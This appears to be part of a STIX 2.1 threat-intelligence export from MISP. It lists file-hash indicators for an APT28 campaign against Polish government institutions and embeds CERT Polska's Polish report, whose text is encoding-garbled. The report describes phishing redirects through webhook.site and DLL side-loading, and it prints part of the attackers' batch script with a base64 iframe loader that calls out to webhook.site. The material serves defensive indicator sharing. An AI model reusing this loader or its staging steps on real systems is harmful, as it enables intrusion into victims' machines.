"type": "indicator",
"spec_version": "2.1",
"id": "indicator--4c6e4ae6-993d-49c0-8ae7-74bbc51f9849",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2024-05-08T16:20:00.000Z",
"modified": "2024-05-08T16:20:00.000Z",
"pattern": "[file:hashes.SHA256 = 'b3e60909036c4110eb7e3d8c0b1db5be5c164fcc32056885e4f1afe561341afd' AND file:name = 'IMG-89848928.jpg']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2024-05-08T16:20:00Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--a90b87b4-5afa-460c-b3b7-c2ae9d6b3334",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2024-05-08T16:20:19.000Z",
"modified": "2024-05-08T16:20:19.000Z",
"pattern": "[file:hashes.SHA256 = '939e664afa589272c4920b8463d80757afe5b1abd294cd9e59104c04da023364' AND file:name = 'cvywrkrhhfzza.css']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2024-05-08T16:20:19Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--cba32fe0-9818-41f5-b607-7eded83314f9",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2024-05-08T16:20:40.000Z",
"modified": "2024-05-08T16:20:40.000Z",
"pattern": "[file:hashes.SHA256 = '5883842c87ca6b59236257e15db983cc88d4948cf0d649455f8f393899673fcc' AND file:name = 'IMG-3907894910429.zip']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2024-05-08T16:20:40Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--b80aa835-216b-4c6a-8837-c3bb28da8718",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2024-05-08T16:20:59.000Z",
"modified": "2024-05-08T16:20:59.000Z",
"pattern": "[file:hashes.SHA256 = '0873a19d278a7a8e8cff2dc2e7edbfddc650d8ea961162a6eb3cb3ea14665983' AND file:name = 'WindowsCodecs.dll']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2024-05-08T16:20:59Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--a93c737d-21a6-412b-a920-a68b8e57590d",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2024-05-08T16:21:12.000Z",
"modified": "2024-05-08T16:21:12.000Z",
"pattern": "[file:hashes.SHA256 = 'e826dc4f5c16a1802517881f32f26061a4cbc508c3f7944540a209217078aa11' AND file:name = 'bmpxjphdzwommblflx.bat']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2024-05-08T16:21:12Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--c7737529-d089-43b9-9ef1-f5cfdb11bd64",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2024-05-08T16:21:28.000Z",
"modified": "2024-05-08T16:21:28.000Z",
"pattern": "[file:hashes.SHA256 = '750948489ed5b92750dc254c47b02eb595c6ffcefded6f9d14c3482a96a6e793' AND file:name = 'IMG-3907894910429.jpg']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2024-05-08T16:21:28Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--29f885e5-676a-4eac-b824-694d79adada6",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2024-05-08T16:21:43.000Z",
"modified": "2024-05-08T16:21:43.000Z",
"pattern": "[file:hashes.SHA256 = '939e664afa589272c4920b8463d80757afe5b1abd294cd9e59104c04da023364' AND file:name = 'qseybqanfkus.css']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2024-05-08T16:21:43Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "x-misp-object",
"spec_version": "2.1",
"id": "x-misp-object--ee17c073-f9a9-4be9-a7fc-ee2571e44da6",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2024-05-08T16:23:54.000Z",
"modified": "2024-05-08T16:23:54.000Z",
"labels": [
"misp:name=\"report\"",
"misp:meta-category=\"misc\""
],
"x_misp_attributes": [
{
"type": "link",
"object_relation": "link",
"value": "https://cert.pl/posts/2024/05/apt28-kampania/",
"category": "External analysis",
"uuid": "fee1f798-295d-44bd-b84c-49ff4a2f4308"
},
{
"type": "text",
"object_relation": "title",
"value": "Kampania APT28 skierowana przeciwko polskim instytucjom rz\u0105dowym",
"category": "Other",
"uuid": "710bf56b-3237-4259-9697-e0bc672d4211"
},
{
"type": "text",
"object_relation": "type",
"value": "Blog",
"category": "Other",
"uuid": "9d6c23db-82c8-423d-887c-59ea34960f4f"
}
],
"x_misp_meta_category": "misc",
"x_misp_name": "report"
},
{
"type": "note",
"spec_version": "2.1",
"id": "note--2d5b8eaf-a5c9-49e3-92be-aed19adeddb4",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2024-05-08T16:23:15.000Z",
"modified": "2024-05-08T16:23:15.000Z",
"abstract": "Report from - https://cert.pl/posts/2024/05/apt28-kampania/ (1715185341)",
"content": "# Kampania APT28 skierowana przeciwko polskim instytucjom rz\u00c4 dowym 08 maja 2024 | CERT Polska | #ostrze\u00c5\u00bcenie, #apt, #apt28 Zespo\u00c5\u0082y CERT Polska (CSIRT NASK) oraz CSIRT MON zaobserwowa\u00c5\u0082y w tym tygodniu szeroko zakrojon\u00c4 kampani\u00c4\u0099 szkodliwego oprogramowania wymierzon\u00c4 w polskie instytucje rz\u00c4 dowe. Na podstawie wska\u00c5\u00banik\u00c3\u00b3w technicznych i podobie\u00c5\u0084stwa do atak\u00c3\u00b3w opisywanych w przesz\u00c5\u0082o\u00c5\u009bci (m.in. na podmioty ukrai\u00c5\u0084skie), mo\u00c5\u00bcna powi\u00c4 za\u00c4\u0087 kampani\u00c4\u0099 ze zbiorem aktywno\u00c5\u009bci APT28, kt\u00c3\u00b3ry jest kojarzony z G\u00c5\u0082\u00c3\u00b3wnym Zarz\u00c4 dem Wywiadowczym Sztabu Generalnego Si\u00c5\u0082 Zbrojnych Federacji Rosyjskiej (GRU).\r\n\r\n ## Analiza techniczna\r\n\r\n W kampanii zosta\u00c5\u0082y rozes\u00c5\u0082ane wiadomo\u00c5\u009bci e-mail o tre\u00c5\u009bci, kt\u00c3\u00b3ra ma wywo\u00c5\u0082a\u00c4\u0087 zainteresowanie u odbiorcy i nak\u00c5\u0082oni\u00c4\u0087 go do klikni\u00c4\u0099cia w link. Przyk\u00c5\u0082ad u\u00c5\u00bcytej wiadomo\u00c5\u009bci przedstawiamy poni\u00c5\u00bcej: \r\n\r\n Link kieruje do adresu w domenie run.mocky.io. Jest to darmowy serwis u\u00c5\u00bcywany przez programist\u00c3\u00b3w, do tworzenia i testowania interfejs\u00c3\u00b3w API. W tym przypadku zosta\u00c5\u0082 on wykorzystany jedynie do przekierowania na kolejny serwis \u00e2\u0080\u0093 webhook.site, pozwalaj\u00c4 cy na logowanie wszelkich zapyta\u00c5\u0084 do wygenerowanego adresu oraz konfigurowanie odpowiedzi na nie. Serwis ten r\u00c3\u00b3wnie\u00c5\u00bc jest popularny w\u00c5\u009br\u00c3\u00b3d os\u00c3\u00b3b zwi\u00c4 zanych z IT. Wykorzystanie darmowych, powszechnie u\u00c5\u00bcywanych us\u00c5\u0082ug, zamiast w\u00c5\u0082asnych domen, pozwala na znaczne ograniczenie wykrycia link\u00c3\u00b3w jako z\u00c5\u0082o\u00c5\u009bliwe, a jednocze\u00c5\u009bnie obni\u00c5\u00bca koszt prowadzonej operacji. Jest to trend, kt\u00c3\u00b3ry obserwujemy u wielu grup APT.\r\n\r\n Z serwisu webhook.site zostaje ostatecznie pobrane archiwum ZIP, kt\u00c3\u00b3rego nazwa sugeruje zawarto\u00c5\u009b\u00c4\u0087 w postaci zdj\u00c4\u0099\u00c4\u0087. Zaczyna si\u00c4\u0099 ona od IMG-, a ko\u00c5\u0084czy losow\u00c4 liczb\u00c4 - np. IMG-238279780.zip. Po klikni\u00c4\u0099ciu w archiwum, przy domy\u00c5\u009blnych ustawieniach systemu Windows (ukryte rozszerzenia i brak pokazywania ukrytych plik\u00c3\u00b3w), ofierze ukazuje si\u00c4\u0099 nast\u00c4\u0099puj\u00c4 cy widok:\r\n\r\n Tak naprawd\u00c4\u0099 archiwum zawiera trzy pliki: \r\n\r\n \r\n * kalkulator windowsowy ze zmienion\u00c4 nazw\u00c4 , np. IMG-238279780.jpg.exe, kt\u00c3\u00b3ry udaje zdj\u00c4\u0099cie i zach\u00c4\u0099ca ofiar\u00c4\u0099 do klikni\u00c4\u0099cia,\r\n * skrypt .bat (plik ukryty),\r\n * fa\u00c5\u0082szyw\u00c4 bibliotek\u00c4\u0099 WindowsCodecs.dll (plik ukryty).\r\n \r\n Je\u00c5\u009bli ofiara uruchomi plik IMG-238279780.jpg.exe (b\u00c4\u0099d\u00c4 cy nieszkodliwym kalkulatorem), podczas startu spr\u00c3\u00b3buje on za\u00c5\u0082adowa\u00c4\u0087 bibliotek\u00c4\u0099 WindowsCodecs.dll, kt\u00c3\u00b3ra zosta\u00c5\u0082a podstawiona przez atakuj\u00c4 cych. Jest to technika znana jako *DLL Side-Loading*. Jedyn\u00c4 rol\u00c4 biblioteki DLL jest uruchomenie do\u00c5\u0082\u00c4 czonego skryptu BAT:\r\n\r\n @echo off if not DEFINED IS\\_MINIMIZED ( set IS\\_MINIMIZED=1 start \"\" /min \"%~dpnx0\" %* exit ) start msedge data:text/html;base64,PHRpdGxlPklNRy02MzQ5MjMzNjk2OC5qcGc8L3RpdGxlPjxpZnJhbWUgc3JjPSJodHRwczovL3dlYmhvb2suc2l0ZS9hYWU0MmFlNC1mM2VhLTRkYmYtYTMzZi0zZmY1YjFiYWVjOWIiIHN0eWxlPSJwb3NpdGlvbjpmaXhlZDsgdG9wOjA7IGxlZnQ6MDsgYm90dG9tOjA7IHJpZ2h0OjA7IHdpZHRoOjEwMCU7IGhlaWdodDoxMDAlOyBib3JkZXI6bm9uZTsgbWFyZ2luOjA7IHBhZGRpbmc6MDsgb3ZlcmZsb3c6aGlkZGVuOyB6LWluZGV4Ojk5OTk5OTsiPjwvaWZyYW1lPg== timeout 15 > nul move %userprofile%\\downloads\\IMG-63492336968.jpg %programdata%\\IMG-63492336968.cmd > nul typ
"object_refs": [
"report--482a37ad-cfaf-41cc-9bef-b3829dde3b3f"
]
},
{
"type": "marking-definition",
"spec_version": "2.1",
"id": "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9",
"created": "2017-01-20T00:00:00.000Z",
"definition_type": "tlp",
"name": "TLP:WHITE",
"definition": {
"tlp": "white"
}
}
]
}
Reference in a new issue Copy permalink